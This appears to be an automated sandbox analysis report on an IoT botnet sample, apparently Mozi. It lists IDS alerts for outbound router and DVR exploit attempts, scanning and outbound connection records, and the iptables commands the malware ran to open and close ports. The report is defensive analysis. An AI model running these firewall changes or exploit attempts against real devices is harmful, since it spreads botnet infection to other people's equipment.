Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.50.122.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50886 -> 154.3.84.96:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.33.227: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.117.122:8082 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.160.123: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60358 -> 166.88.13.234:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.23.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.106.144.216: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.109.232.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:47256 -> 204.232.228.51:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.83.241:80 -> 192.168.2.20:49468
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:41890 -> 118.48.130.177:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33196 -> 185.36.171.129:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 19.35.22.33 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 69.153.253.195 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 215.110.247.154 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 7.133.161.69 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 48.57.169.235 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 57.50.30.157 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 69.107.161.237 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 84.183.159.213 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 54.39.218.76 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 37.127.116.2 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 27.46.25.163 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 183.30.162.72 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 12.121.21.175 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 151.160.250.99 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 72.240.24.193 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 112.36.7.254 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 200.160.26.61 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 49.240.54.114 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 8.191.54.125 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 54.72.49.99 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 102.247.160.88 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 91.192.83.22 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 3.31.11.51 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 21.71.60.36 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 188.61.141.250 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 141.215.180.231 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 137.225.108.177 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 146.5.176.64 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 160.189.168.11 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 89.192.178.91 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 91.193.93.252 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 220.112.131.158 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 146.31.191.38 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 175.79.49.111 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 189.16.44.51 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 184.225.49.232 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 137.142.227.113 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 211.130.169.58 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 108.58.115.194 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 85.4.13.35 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 45.71.81.134 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 215.122.80.92 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 116.26.35.18 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 15.81.245.80 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 72.204.193.69 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 33.33.197.233 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 11.0.46.244 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 81.185.164.190 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 47.167.153.49 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 222.36.210.127 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 198.26.185.1 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 5.144.31.210 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 97.149.39.21 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 66.156.43.17 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 46.138.124.14 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 119.17.3.130 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 54.194.243.156 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 62.237.39.27 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 35.197.143.134 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 117.0.115.227 ports 2,5,6,8,9,52869
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4672) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4679) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4720) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4732) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4755) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4763) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4785) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4815) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4819) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4838) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4866) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4896) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4915) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4939) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4986) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5015) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5063) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5071) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5095) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5119) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5139) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5158) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5167) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5194) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5215) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5229) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5253) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 54390
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:50800 -> 173.128.113.111:7574
Source: global traffic TCP traffic: 192.168.2.20:52994 -> 151.70.88.212:5555
Source: global traffic TCP traffic: 192.168.2.20:40582 -> 37.127.116.2:52869
Source: global traffic TCP traffic: 192.168.2.20:49692 -> 73.213.225.252:8443
Source: global traffic TCP traffic: 192.168.2.20:44244 -> 164.95.80.124:8443
Source: global traffic TCP traffic: 192.168.2.20:43214 -> 65.119.165.128:7574
Source: global traffic TCP traffic: 192.168.2.20:41268 -> 112.60.138.223:7574
Source: global traffic TCP traffic: 192.168.2.20:49422 -> 54.72.49.99:52869
Source: global traffic TCP traffic: 192.168.2.20:43636 -> 159.134.45.88:8443
Source: global traffic TCP traffic: 192.168.2.20:40086 -> 169.108.151.225:8443
Source: global traffic TCP traffic: 192.168.2.20:58250 -> 46.69.243.160:81
Source: global traffic TCP traffic: 192.168.2.20:50540 -> 45.71.81.134:37215
Source: global traffic TCP traffic: 192.168.2.20:42756 -> 187.65.235.163:8080
Source: global traffic TCP traffic: 192.168.2.20:47538 -> 133.182.208.68:8443
Source: global traffic TCP traffic: 192.168.2.20:59888 -> 65.169.70.71:5555
Source: global traffic TCP traffic: 192.168.2.20:52378 -> 96.200.64.71:7574
Source: global traffic TCP traffic: 192.168.2.20:53936 -> 99.231.44.225:8080
Source: global traffic TCP traffic: 192.168.2.20:40382 -> 88.83.215.123:5555
Source: global traffic TCP traffic: 192.168.2.20:60188 -> 112.188.233.56:7574
Source: global traffic TCP traffic: 192.168.2.20:33888 -> 177.228.76.105:5555
Source: global traffic TCP traffic: 192.168.2.20:38378 -> 196.250.243.57:8080
Source: global traffic TCP traffic: 192.168.2.20:60388 -> 151.160.250.99:37215
Source: global traffic TCP traffic: 192.168.2.20:36256 -> 141.215.180.231:52869
Source: global traffic TCP traffic: 192.168.2.20:52424 -> 53.12.181.226:7574
Source: global traffic TCP traffic: 192.168.2.20:35830 -> 72.240.24.193:52869
Source: global traffic TCP traffic: 192.168.2.20:48832 -> 168.237.187.123:5555
Source: global traffic TCP traffic: 192.168.2.20:58328 -> 60.222.236.176:8080
Source: global traffic TCP traffic: 192.168.2.20:57698 -> 45.220.233.11:8080
Source: global traffic TCP traffic: 192.168.2.20:39368 -> 188.61.141.250:49152
Source: global traffic TCP traffic: 192.168.2.20:53682 -> 189.51.61.124:5555
Source: global traffic TCP traffic: 192.168.2.20:53168 -> 82.32.209.151:8443
Source: global traffic TCP traffic: 192.168.2.20:53620 -> 54.139.218.167:5555
Source: global traffic TCP traffic: 192.168.2.20:39316 -> 54.194.243.156:49152
Source: global traffic TCP traffic: 192.168.2.20:33798 -> 161.170.180.99:81
Source: global traffic TCP traffic: 192.168.2.20:54032 -> 219.190.141.219:8080
Source: global traffic TCP traffic: 192.168.2.20:45228 -> 102.247.160.88:52869
Source: global traffic TCP traffic: 192.168.2.20:57020 -> 178.236.3.160:8443
Source: global traffic TCP traffic: 192.168.2.20:44548 -> 42.112.107.113:81
Source: global traffic TCP traffic: 192.168.2.20:52310 -> 214.58.190.175:8080
Source: global traffic TCP traffic: 192.168.2.20:59932 -> 15.81.245.80:37215
Source: global traffic TCP traffic: 192.168.2.20:60906 -> 3.31.11.51:52869
Source: global traffic TCP traffic: 192.168.2.20:38286 -> 8.231.233.201:8080
Source: global traffic TCP traffic: 192.168.2.20:50754 -> 161.95.111.90:8080
Source: global traffic TCP traffic: 192.168.2.20:49450 -> 115.251.170.50:8443
Source: global traffic TCP traffic: 192.168.2.20:40136 -> 21.210.48.60:5555
Source: global traffic TCP traffic: 192.168.2.20:37408 -> 19.228.27.33:8080
Source: global traffic TCP traffic: 192.168.2.20:59548 -> 198.75.210.198:7574
Source: global traffic TCP traffic: 192.168.2.20:57734 -> 157.111.93.206:5555
Source: global traffic TCP traffic: 192.168.2.20:53854 -> 8.191.54.125:37215
Source: global traffic TCP traffic: 192.168.2.20:36222 -> 83.169.154.146:8443
Source: global traffic TCP traffic: 192.168.2.20:40470 -> 28.20.175.209:81
Source: global traffic TCP traffic: 192.168.2.20:54056 -> 11.0.46.244:49152
Source: global traffic TCP traffic: 192.168.2.20:50054 -> 46.138.124.14:49152
Source: global traffic TCP traffic: 192.168.2.20:55876 -> 48.57.169.235:37215
Source: global traffic TCP traffic: 192.168.2.20:38722 -> 188.76.169.197:8080
Source: global traffic TCP traffic: 192.168.2.20:51776 -> 54.214.12.70:5555
Source: global traffic TCP traffic: 192.168.2.20:40314 -> 222.36.210.127:37215
Source: global traffic TCP traffic: 192.168.2.20:59114 -> 202.164.221.195:49152
Source: global traffic TCP traffic: 192.168.2.20:50036 -> 119.17.3.130:49152
Source: global traffic TCP traffic: 192.168.2.20:57186 -> 215.110.247.154:52869
Source: global traffic TCP traffic: 192.168.2.20:57952 -> 118.183.105.53:8443
Source: global traffic TCP traffic: 192.168.2.20:33232 -> 27.46.25.163:52869
Source: global traffic TCP traffic: 192.168.2.20:36872 -> 62.237.39.27:49152
Source: global traffic TCP traffic: 192.168.2.20:60776 -> 174.11.178.210:5555
Source: global traffic TCP traffic: 192.168.2.20:38918 -> 164.156.119.109:8080
Source: global traffic TCP traffic: 192.168.2.20:56754 -> 185.95.199.80:8080
Source: global traffic TCP traffic: 192.168.2.20:42484 -> 88.64.5.249:8080
Source: global traffic TCP traffic: 192.168.2.20:59846 -> 202.171.192.205:7574
Source: global traffic TCP traffic: 192.168.2.20:58760 -> 194.243.234.78:8080
Source: global traffic TCP traffic: 192.168.2.20:46986 -> 76.5.175.91:7574
Source: global traffic TCP traffic: 192.168.2.20:52502 -> 160.189.168.11:37215
Source: global traffic TCP traffic: 192.168.2.20:60458 -> 184.133.154.232:8080
Source: global traffic TCP traffic: 192.168.2.20:43954 -> 46.110.225.126:8080
Source: global traffic TCP traffic: 192.168.2.20:34068 -> 122.76.30.28:8080
Source: global traffic TCP traffic: 192.168.2.20:50900 -> 146.5.176.64:49152
Source: global traffic TCP traffic: 192.168.2.20:47640 -> 137.225.108.177:49152
Source: global traffic TCP traffic: 192.168.2.20:37910 -> 162.72.144.200:8443
Source: global traffic TCP traffic: 192.168.2.20:44098 -> 14.137.108.35:8080
Source: global traffic TCP traffic: 192.168.2.20:55294 -> 103.208.59.35:8080
Source: global traffic TCP traffic: 192.168.2.20:49854 -> 175.79.49.111:52869
Source: global traffic TCP traffic: 192.168.2.20:51114 -> 184.195.78.194:5555
Source: global traffic TCP traffic: 192.168.2.20:50090 -> 195.254.187.23:8080
Source: global traffic TCP traffic: 192.168.2.20:39760 -> 62.217.214.44:8080
Source: global traffic TCP traffic: 192.168.2.20:51876 -> 198.26.185.1:49152
Source: global traffic TCP traffic: 192.168.2.20:44500 -> 90.59.150.212:5555
Source: global traffic TCP traffic: 192.168.2.20:40216 -> 57.50.30.157:49152
Source: global traffic TCP traffic: 192.168.2.20:56508 -> 196.8.192.224:8080
Source: global traffic TCP traffic: 192.168.2.20:43366 -> 85.122.252.148:8443
Source: global traffic TCP traffic: 192.168.2.20:43488 -> 137.142.227.113:37215
Source: global traffic TCP traffic: 192.168.2.20:33858 -> 220.186.175.16:5555
Source: global traffic TCP traffic: 192.168.2.20:48744 -> 11.151.211.21:8443
Source: global traffic TCP traffic: 192.168.2.20:35056 -> 99.22.46.253:81
Source: global traffic TCP traffic: 192.168.2.20:51026 -> 194.63.219.69:81
Source: global traffic TCP traffic: 192.168.2.20:41328 -> 22.104.172.87:8080
Source: global traffic TCP traffic: 192.168.2.20:37098 -> 125.45.4.232:7574
Source: global traffic TCP traffic: 192.168.2.20:57546 -> 84.183.159.213:37215
Source: global traffic TCP traffic: 192.168.2.20:45660 -> 77.125.39.19:7574
Source: global traffic TCP traffic: 192.168.2.20:39476 -> 81.227.254.8:8080
Source: global traffic TCP traffic: 192.168.2.20:58714 -> 186.124.130.151:8443
Source: global traffic TCP traffic: 192.168.2.20:44310 -> 135.13.251.193:8443
Source: global traffic TCP traffic: 192.168.2.20:58216 -> 49.240.54.114:49152
Source: global traffic TCP traffic: 192.168.2.20:55714 -> 97.149.39.21:52869
Source: global traffic TCP traffic: 192.168.2.20:44856 -> 145.201.199.95:8080
Source: global traffic TCP traffic: 192.168.2.20:54518 -> 145.243.250.38:8080
Source: global traffic TCP traffic: 192.168.2.20:46072 -> 53.140.123.217:8443
Source: global traffic TCP traffic: 192.168.2.20:53028 -> 46.29.166.221:8080
Source: global traffic TCP traffic: 192.168.2.20:44150 -> 96.117.90.192:8080
Source: global traffic TCP traffic: 192.168.2.20:47674 -> 44.173.210.161:8080
Source: global traffic TCP traffic: 192.168.2.20:44056 -> 131.108.171.195:5555
Source: global traffic TCP traffic: 192.168.2.20:47758 -> 7.133.161.69:37215
Source: global traffic TCP traffic: 192.168.2.20:60334 -> 209.224.95.250:8443
Source: global traffic TCP traffic: 192.168.2.20:40270 -> 63.27.192.49:8080
Source: global traffic TCP traffic: 192.168.2.20:46282 -> 112.36.7.254:37215
Source: global traffic TCP traffic: 192.168.2.20:36712 -> 35.42.181.95:8443
Source: global traffic TCP traffic: 192.168.2.20:37028 -> 85.34.73.210:5555
Source: global traffic TCP traffic: 192.168.2.20:36212 -> 205.214.189.164:8443
Source: global traffic TCP traffic: 192.168.2.20:57058 -> 69.153.253.195:49152
Source: global traffic TCP traffic: 192.168.2.20:46398 -> 54.39.218.76:37215
Source: global traffic TCP traffic: 192.168.2.20:42590 -> 199.22.238.78:8080
Source: global traffic TCP traffic: 192.168.2.20:50434 -> 183.247.34.112:81
Source: global traffic TCP traffic: 192.168.2.20:33194 -> 26.17.1.11:8080
Source: global traffic TCP traffic: 192.168.2.20:38044 -> 91.193.93.252:52869
Source: global traffic TCP traffic: 192.168.2.20:59878 -> 47.167.153.49:52869
Source: global traffic TCP traffic: 192.168.2.20:53416 -> 37.157.134.82:8080
Source: global traffic TCP traffic: 192.168.2.20:59302 -> 65.218.226.124:7574
Source: global traffic TCP traffic: 192.168.2.20:39006 -> 133.225.142.204:8443
Source: global traffic TCP traffic: 192.168.2.20:45766 -> 33.33.197.233:52869
Source: global traffic TCP traffic: 192.168.2.20:56848 -> 57.2.217.0:5555
Source: global traffic TCP traffic: 192.168.2.20:36556 -> 114.208.194.52:8080
Source: global traffic TCP traffic: 192.168.2.20:47474 -> 168.155.124.28:81
Source: global traffic TCP traffic: 192.168.2.20:44738 -> 200.70.157.247:8080
Source: global traffic TCP traffic: 192.168.2.20:52742 -> 18.22.126.190:8443
Source: global traffic TCP traffic: 192.168.2.20:33038 -> 162.168.17.49:7574
Source: global traffic TCP traffic: 192.168.2.20:36808 -> 116.26.35.18:52869
Source: global traffic TCP traffic: 192.168.2.20:41998 -> 19.224.127.237:8080
Source: global traffic TCP traffic: 192.168.2.20:33120 -> 33.247.46.190:8080
Source: global traffic TCP traffic: 192.168.2.20:57164 -> 19.94.113.230:8080
Source: global traffic TCP traffic: 192.168.2.20:58236 -> 66.156.43.17:52869
Source: global traffic TCP traffic: 192.168.2.20:38722 -> 5.144.31.210:37215
Source: global traffic TCP traffic: 192.168.2.20:33704 -> 65.59.81.254:8443
Source: global traffic TCP traffic: 192.168.2.20:45044 -> 111.147.154.242:8080
Source: global traffic TCP traffic: 192.168.2.20:58678 -> 42.247.127.116:8443
Source: global traffic TCP traffic: 192.168.2.20:35152 -> 13.143.231.12:8080
Source: global traffic TCP traffic: 192.168.2.20:57278 -> 18.196.100.83:8080
Source: global traffic TCP traffic: 192.168.2.20:54076 -> 144.171.238.211:81
Source: global traffic TCP traffic: 192.168.2.20:51050 -> 18.149.58.148:8080
Source: global traffic TCP traffic: 192.168.2.20:38730 -> 122.139.195.181:8080
Source: global traffic TCP traffic: 192.168.2.20:54690 -> 184.225.49.232:52869
Source: global traffic TCP traffic: 192.168.2.20:55844 -> 19.35.22.33:52869
Source: global traffic TCP traffic: 192.168.2.20:40502 -> 210.120.216.194:8080
Source: global traffic TCP traffic: 192.168.2.20:39164 -> 31.69.24.163:81
Source: global traffic TCP traffic: 192.168.2.20:44118 -> 189.16.44.51:37215
Source: global traffic TCP traffic: 192.168.2.20:33812 -> 35.197.143.134:49152
Source: global traffic TCP traffic: 192.168.2.20:48974 -> 69.107.161.237:37215
Source: global traffic TCP traffic: 192.168.2.20:59348 -> 67.97.143.243:8443
Source: global traffic TCP traffic: 192.168.2.20:59968 -> 59.141.161.142:8080
Source: global traffic TCP traffic: 192.168.2.20:36518 -> 160.161.138.92:8443
Source: global traffic TCP traffic: 192.168.2.20:43408 -> 185.169.150.24:8080
Source: global traffic TCP traffic: 192.168.2.20:59912 -> 195.8.49.55:81
Source: global traffic TCP traffic: 192.168.2.20:48298 -> 186.144.158.222:7574
Source: global traffic TCP traffic: 192.168.2.20:59652 -> 215.122.80.92:49152
Source: global traffic TCP traffic: 192.168.2.20:33622 -> 183.30.162.72:52869
Source: global traffic TCP traffic: 192.168.2.20:42074 -> 208.77.218.190:8080
Source: global traffic TCP traffic: 192.168.2.20:58454 -> 19.110.225.46:8080
Source: global traffic TCP traffic: 192.168.2.20:35942 -> 91.192.83.22:37215
Source: global traffic TCP traffic: 192.168.2.20:48822 -> 146.31.191.38:49152
Source: global traffic TCP traffic: 192.168.2.20:58146 -> 81.192.248.54:8080
Source: global traffic TCP traffic: 192.168.2.20:42694 -> 220.112.131.158:49152
Source: global traffic TCP traffic: 192.168.2.20:54502 -> 12.121.21.175:49152
Source: global traffic TCP traffic: 192.168.2.20:48304 -> 93.252.183.105:5555
Source: global traffic TCP traffic: 192.168.2.20:40482 -> 169.153.122.4:8080
Source: global traffic TCP traffic: 192.168.2.20:37676 -> 45.175.32.225:7574
Source: global traffic TCP traffic: 192.168.2.20:55092 -> 175.116.229.144:8443
Source: global traffic TCP traffic: 192.168.2.20:40358 -> 1.229.142.252:8080
Source: global traffic TCP traffic: 192.168.2.20:55158 -> 161.55.227.176:8080
Source: global traffic TCP traffic: 192.168.2.20:40944 -> 3.54.72.115:8443
Source: global traffic TCP traffic: 192.168.2.20:60000 -> 211.130.169.58:52869
Source: global traffic TCP traffic: 192.168.2.20:58138 -> 71.189.125.136:8080
Source: global traffic TCP traffic: 192.168.2.20:52926 -> 35.134.65.144:5555
Source: global traffic TCP traffic: 192.168.2.20:53140 -> 81.185.164.190:49152
Source: global traffic TCP traffic: 192.168.2.20:58740 -> 68.38.131.19:8443
Source: global traffic TCP traffic: 192.168.2.20:48186 -> 158.215.177.9:7574
